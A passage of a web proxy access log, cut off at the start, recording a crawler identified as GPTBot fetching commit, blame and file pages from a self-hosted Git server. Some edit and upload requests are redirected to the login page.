GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:16:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_error.log?display=source" [Client 74.7.227.38] [Length 19741] [Gzip 7.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:16:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_stream_access.log?display=source" [Client 74.7.227.38] [Length 10986] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:16:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_stream_access.log?display=source" [Client 74.7.227.38] [Length 10989] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:16:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_access.log?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:16:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_error.log?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:16:21:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_access.log?display=source" [Client 74.7.227.38] [Length 34925] [Gzip 9.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:16:21:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_access.log?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:16:22:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13449] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:22:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16097] [Gzip 9.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:22:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16097] [Gzip 9.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:22:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13450] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16095] [Gzip 9.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:22:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:22:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_error.log?display=source" [Client 74.7.227.38] [Length 20913] [Gzip 7.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:16:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_access.log?display=source" [Client 74.7.227.38] [Length 40928] [Gzip 9.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:16:22:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_stream_access.log?display=source" [Client 74.7.227.38] [Length 10983] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:16:22:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_access.log?display=rendered" [Client 74.7.227.38] [Length 10974] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:16:22:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_error.log?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:16:22:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64?follow_symlink=1" [Client 74.7.227.38] [Length 11028] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv" +[17/Feb/2026:16:22:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64?follow_symlink=1" [Client 74.7.227.38] [Length 11059] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv" +[17/Feb/2026:16:22:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 11057] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data" +[17/Feb/2026:16:22:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 9840] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:16:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 18420] [Gzip 12.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:16:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:16:22:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:16:22:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf?display=rendered" [Client 74.7.227.38] [Length 11022] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:16:22:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf?display=rendered" [Client 74.7.227.38] [Length 10996] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:16:22:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" +[17/Feb/2026:16:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" +[17/Feb/2026:16:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/status.json?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/status.json" +[17/Feb/2026:16:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/status.json?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/status.json" +[17/Feb/2026:16:22:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host" +[17/Feb/2026:16:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/nginx/proxy_host" +[17/Feb/2026:16:22:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host" +[17/Feb/2026:16:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/npm/data/nginx/proxy_host" +[17/Feb/2026:16:22:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host" +[17/Feb/2026:16:22:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/nginx/proxy_host" +[17/Feb/2026:16:22:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx" [Client 74.7.227.38] [Length 10083] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host" +[17/Feb/2026:16:22:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:16:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:16:22:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:16:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:16:22:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/status.json?display=rendered" [Client 74.7.227.38] [Length 10892] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/status.json" +[17/Feb/2026:16:22:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:16:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10125] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:16:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/status.json?display=rendered" [Client 74.7.227.38] [Length 10894] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/status.json" +[17/Feb/2026:16:22:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/pyvenv.cfg?display=source" [Client 74.7.227.38] [Length 11253] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:16:22:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 9926] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" +[17/Feb/2026:16:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=html" [Client 74.7.227.38] [Length 26057] [Gzip 5.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:16:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json?display=source" [Client 74.7.227.38] [Length 11552] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json" +[17/Feb/2026:16:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/nginx" [Client 74.7.227.38] [Length 10046] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx" +[17/Feb/2026:16:22:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/nginx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx" +[17/Feb/2026:16:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/nginx" +[17/Feb/2026:16:22:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/npm/data/nginx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx" 